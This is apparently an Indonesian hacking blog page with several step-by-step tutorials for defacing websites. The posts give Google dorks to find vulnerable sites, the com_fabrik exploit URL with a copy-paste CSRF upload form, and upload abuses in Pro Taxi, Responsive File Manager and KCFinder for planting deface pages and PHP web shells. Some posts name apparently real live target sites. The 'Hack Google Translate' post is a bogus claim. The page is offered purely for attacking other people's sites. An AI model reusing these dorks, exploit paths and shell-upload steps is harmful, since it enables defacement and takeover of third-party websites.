Minggu, 22 Juli 2018

Cara deface dengan metode com_fabrik

Assalamualaikum mamank :v
Yo wazzap guys kembali lagi sama gw.
Assault K2 admin gans.
Kali ini kita akan membahas cara deface metode com_fabrik dengan csrf metode ini bisa di bilang juga mudah si, kalo udah ngerti :v ok langsung aja simak baik baik ea :v
Siap kan bahan-bahannya dulu :v
1.dork : inurl:index.php?option=com_fabrik
Buat Dorking di google
2.exploit nya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

 Taruh di belakang website contoh ( www.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload )

 3.csrf nya kalean bisa buat sendiri, copy paste aja nih yang di bawah sini :v
<html>

 <style type="text/css">

 body {

 background-color: black;

 background-image: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRwi_Zmk1HfBEQTDXqyCQmMGFWhZ3wih20pEzRdZ2zz0FPo4IAVmyu0KPVICQ");

 background-repeat: no-repeat;

 font-family: 'Sedgwick Ave', Cursive;

 background-size: 100% 100%;

 }

 </style>

   <center>

 <table height="100%" width="100%"><font color="Blue" size="100" face="cursive">ELITE CYBER TEAM</font></center></table>

   <form method="POST" action="target.com" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>

 </html>
4. Script Kesayangan Kalean ok :v
Langsung sadja langkah pertama kita dorking dulu di mbah google :v
Next kalean tinggal pilih target buat di tusbol :v

Selanjutnya kalian masukkan exploitnya ke target kalean exploitnya ada di atas ok


Gk tau cara masukkin exploitnya?? Waduh kalean terlalu polos :v
Contoh http://www.tagetlu.co.il/masukkan exploitnya di belakang web target kalean

Kalo muncul tulisan yang kaya di atas berarti web itu vuln siap di tusbol :v



Next lalu copy link yang di atas tadi yang sudah di taro exploitnya lalu simpan ke csrf kalean kalo blm ada bisa di ambil di atas tadi :')



Kalo sudah di taro tinggal kita buka csrf nya lalu upload script deface kalean 

Setelah di upload tampilannya akan berubah seperti ini 
Kalo tampilan nya berubah seperti itu berarti 100% berhasil no hoax :v 
Setelah itu tinggal mengakses nya dengan cara
http://www.targetlu.co.il/nama script deface lu 
Dan hasilnya, Tara web sudah ter deface 
Mudah kan 
Gak percaya coba aja sendiri :v

Thanks karena sudah berkunjung ke web kami 

Wassalamu'alaikum warahmatullahi wabarakatu
Diposting oleh di Tidak ada komentar:

Sabtu, 21 Juli 2018

Cara Deface Metode Pro Taxi

Author:./ScXr00t Gans:v
      



Yoo wassap guys ;v kali ini gw mau membagikan tutorial Deface Website Metode Pro Taxi 
Menggunakan hp android sambil ea gan:v

Langsung simak aja ya ðŸ˜‚

Siapin Dlu Bahan-Bahannya :D
- HP
- Browser(Gw Saranin Pake Uc Browser Yaa Guys):v
- Koneksi Internet
- Script deface
- Shell (Jika dibutuhkan)


Yang pertama, kita dorking di google menggunakan dork :
- inurl:/user/signin intext:SIGN IN NOW
Silahkan kembangin pake otak vokepers lu ya ;v

Setelah ketemu target, masukan exploit
- user/signup
Target :live target baltimoreride.com/user/signin
https://kruz.ca/user/signin
Lakukan pendaftaran seperti biasa, bisa masukan data asal asalan, atau asli. Tapi ingat bagian Email dan Password, karena untuk login nantinya 


Jika sudah mendaftar dan login, nantinya akan ada tampilan seperti dibawah ini. 
Setelah itu, pilih menu "Profile"


Lalu di kolom Photo, pilih menu "Pilih  File" dan pilih script deface kalian :D



Lalu, scroll ke bawah dan klik tombol "Update Profile"



Dan jika anda ingin melihat hasilnya, anda tinggal klik dan tahan di gambar foto sampai keluar tulisan Lihat info halaman dan lihat :v



salin url gambar,dan buka tab baru lalu lu paste dah url nya tadi



Dan tampilannya akan berubah jadi jembut ;v



Silahkan lu lu lu dan lu cba aja sndiri :v

Klo ada salah ketikan atau kurang jelas maapken:v
Oke sgitu aja dri gw ya ;v bye :D

 Sumber: https://noobtersakiticyber.blogspot.com
Diposting oleh di Tidak ada komentar:

Hack Google Translate

Yo wazzap guys kembali lagi dengan gw Assault K2 admin tamvans :v
Kali ini saya akan hack google translate :v simak baik baik ok :v
1.buka website google translate
2.klik 3 titik yang ada di pojok kanan atas

3.ceklis yang tulisan minta situs desktop
4.pencet "terjemahkan dokumen"
5. Pilih file,pilih script deface kalian dan pencet terjemahkan 

 Tara sudah ke hek tuh translate gugel :v


Kaboom:v metode ini cukup mudah :v dan selamat mencoba and happy defacing:v see u mamank:v
Diposting oleh di Tidak ada komentar:
Cara Deface Metode Responsive File Manager

Author:./ScXr00t

Masih Ama ane gan disini :v oke langsung aja simak baik baik ya akmj:v


Dork:
inurl:/filemanager/ intext:"dialog.php"
inurl:/js/filemanager/ intext:"dialog.php"
inurl:/assets/filemanager/ intext:"dialog.php"
Dork nya kembangin lagi

Script deface dengan format .htm .html .txt (Jika mau upload foto pakai format ".jpg .png .gif dan jika ingin upload shell bypass ext shell menjadi .php.fla")

bug : www.targetsuka.co.li/filemanager/dialog.php
www.targetsuka.co.li/path/filemanager/dialog.php

step by step

1. Kalian dorking dulu ke google ea pke dork diatas:v
2. Pilih salah satu target nya yg menurut lu Vuln

3. Klik dialog.php Maka kalian akan beralih ke Responsive Filemanager/tempat upload

4. Klik tombol upload di pojok atas kiri

5. Pilih file yang akan mau kalian upload
6. Jika berhasil nanti akan ada file kalian disana:v

7. Untuk aksesnya kalian kembali dulu ke Responsive filemanager
8. Tahan file yang kalian upload tadi lalu klik Show URL

9. Lalu copy url nya dan pastekan di address bar browser kalian

Kaboom:v metode ini cukup mudah :v dan selamat mencoba and happy defacing:v see u mamank:v
Diposting oleh di 3 komentar:
Cara Deface Metode Kcfinder Vulnerability Upload Shell




Author:./ScXr00t
Oke karena ini postingan pertama tim ane mhank:v ane jd pembuka aja Ea:*

-Siapin SC dulu mhank
-shell klo perlu:v

DORK
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload
panel/kcfinder/upload/files
editor/kcfinder/upload
Kcfinder/upload/files
inurl:/panel/kcfinder/ intext:2017
  1. Sekarang kita dorking dlu ea :v

2. Pilih salah satu web yang menurut otak vokep lu Vuln:v , contoh live target ~> http://nakkargo.com.tr

3. Jika tampilan nya beda atau bukan tempat upload :v masukin exploitnya
exploit > http://nakkargo.com.tr lalu pilih browse.php atau langsung tambahin aja browse php nya dibelakang:v
dikarenakan di atas gue menggunakan dork /panel/kcfinder/ maka exploit nya
http://nakkargo.com.tr/panel/kcfinder
http://nakkargo.com.tr/panel/Kcfinder/browse.php *intinya tergantung path ea mhank:v
4.klo udh tinggal upload aja ea disitu:v
5.upload Ext Shell.php5 / scriptnya.html
6. Jika sudah terupload , silakan akses shell di > nakkargo.com.tr/panel/kcfinder/upload/files/shell.php5

Simple kan:v oke segitu dulu ea mhank:v tunggu postingan berikutnya :v see u mamank:v
Diposting oleh di 3 komentar:
Langganan: Postingan (Atom)